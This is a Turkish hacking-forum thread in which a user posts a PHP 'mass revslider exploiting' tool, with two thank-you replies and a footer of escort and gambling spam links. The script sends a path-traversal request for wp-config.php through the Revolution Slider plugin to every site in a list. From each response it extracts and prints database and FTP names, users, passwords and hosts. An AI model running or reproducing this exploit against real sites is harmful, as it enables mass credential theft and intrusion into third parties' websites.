Wordpress Revslide Açığı

F

fenerove

Forumdan Uzaklaştırıldı
Katılım
22 Ocak 2015
Mesajlar
1,664
Tepkime puanı
0
Puanları
0
Web sitesi
www.fenerove.com
[video=youtube]

Biraz eski bir açık ama yeniler öğrensin izlenmesinde fayda var :)


PHP: 
<body bgcolor="#000000" text="white">
<center>
<font face='courier' color=red size='+1'>
mass revslider exploiting<br>Fenerove - Spycod3<br>http://www.fenerove.com/ - http://ajanlar.org </font><br>
<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>
<?php 

function findit($mytext,$starttag,$endtag) {
 $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
 $posRight = stripos($mytext,$endtag,$posLeft+1);
 return  substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
 $e=explode("\r\n",$co);
 foreach($e as $bda){
	//echo '<br>'.$bda;
	$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
	$dn=($bda).($linkof);
	$file=@file_get_contents($dn);
	if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
	echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
	echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
	echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
	echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
	echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
	}
	elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
	echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
	echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
	echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
	echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
	}
	else{echo "<center><font face='courier' color='yellow' >".$bda." ----> Bulunamadi </font></center>";}
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
 }
 
}

?>
 
KingDoz

KingDoz

Forumdan Uzaklaştırıldı
Katılım
23 Haz 2015
Mesajlar
1,403
Tepkime puanı
0
Puanları
0
Yaş
33
Eline saglık kanka
 
Sid3s

Sid3s

Özel Üye
Katılım
13 Ara 2014
Mesajlar
1,567
Tepkime puanı
0
Puanları
0
Web sitesi
sid3sblog.wordpress.com
Ellerine sağlık . Burdan T3'e selamlar :)
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012